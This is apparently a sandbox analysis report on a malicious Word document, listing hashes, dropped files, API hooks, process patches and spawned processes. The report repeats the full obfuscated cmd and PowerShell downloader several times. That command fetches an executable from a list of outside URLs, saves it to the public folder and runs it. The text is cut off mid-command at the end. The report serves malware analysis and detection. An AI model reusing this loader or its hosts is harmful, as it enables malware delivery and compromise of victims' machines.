%mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))"), Spawned process "powershell.exe" with commandline "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" (Show Process), Spawned process "166520.exe" (Show Process), Spawned process "cosineinit.exe" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"~$vPLpWc.doc" has type "data"
"166520.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"02vPLpWc.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Thu May 17 07:53:26 2018 mtime=Thu May 17 07:53:26 2018 atime=Thu May 17 07:53:56 2018 length=167424 window=hide"
"index.dat" has type "data"
"~WRS{3B257DFB-1EFD-4832-9438-0BDD960DE59D}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"TY98LM19OS4MQAMZCOLL.temp" has type "data"
"~$Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\setupapi.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll" - source
- API Call
- relevance
- 7/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9U"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Heuristic match: "ifcingenieria.cl" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Hooks API calls
- details
-
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Hooks API calls
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "b800000000663d33c0bae405350068dcf52f6cc3" to virtual address "0x0442D814"
"WINWORD.EXE" wrote bytes "b811110000663d33c0ba7c03440468dcf52f6cc3" to virtual address "0x0442D7F4"
"WINWORD.EXE" wrote bytes "135c4f08" to virtual address "0x64B40BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "e93655aded" to virtual address "0x76E53EAE" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e99e48d6ee" to virtual address "0x75B83D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba2405350068dcf52f6cc3" to virtual address "0x0442D7B4"
"WINWORD.EXE" wrote bytes "ff477d09" to virtual address "0x6C7F9904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "c4cab77580bbb775aa6eb8759fbbb77508bbb77546ceb7756138b875de2fb875d0d9b77500000000177930774f9130777f6f3077f4f7307711f73077f2833077857e307700000000" to virtual address "0x6EF81000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "cdba0006" to virtual address "0x2F2C1B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "baf41b4404b98b7b2f6cffe1" to virtual address "0x003614E2"
"WINWORD.EXE" wrote bytes "a1f82708" to virtual address "0x69C6F530" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba2406350068dcf52f6cc3" to virtual address "0x0442D834"
"WINWORD.EXE" wrote bytes "bae4d43d00b98b7b2f6cffe1" to virtual address "0x00360A06"
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba6405350068dcf52f6cc3" to virtual address "0x0442D7D4"
"WINWORD.EXE" wrote bytes "ba28874204b98b7b2f6cffe1" to virtual address "0x0036038E"
"WINWORD.EXE" wrote bytes "ba28bc3d00b98b7b2f6cffe1" to virtual address "0x0036150A"
"WINWORD.EXE" wrote bytes "b800000000663d33c0bae404350068dcf52f6cc3" to virtual address "0x0442D794"
"WINWORD.EXE" wrote bytes "e9c53252ee" to virtual address "0x769A6143" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "afe16309" to virtual address "0x6C9010AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "2da12708" to virtual address "0x65B478E4" (part of module "OART.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Installs hooks/patches the running process
File Details
02vPLpWc
- Filename
- 02vPLpWc
- Size
- 164KiB (167424 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: SHaevaecyvesho12012, Subject: SHaevaecy96784, Author: SHaevae71615, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 17 08:45:00 2018, Last Saved Time/Date: Thu May 17 08:45:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
- Architecture
- WINDOWS
- SHA256
- 2ff15b6627b14bd38a942955121c07ecaefcad830bc952dad87e01a3aa2cf2da
- MD5
- 021fc965d607b23622da10d996c90adf
- SHA1
- 04ea87b8ebdb4f09e114bb0985e4b91f30eae422
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 5 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\02vPLpWc.doc"
(PID: 3952)
-
cmd.exe
Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
(PID: 2952, Additional Context: Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124)))
-
powershell.exe
powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 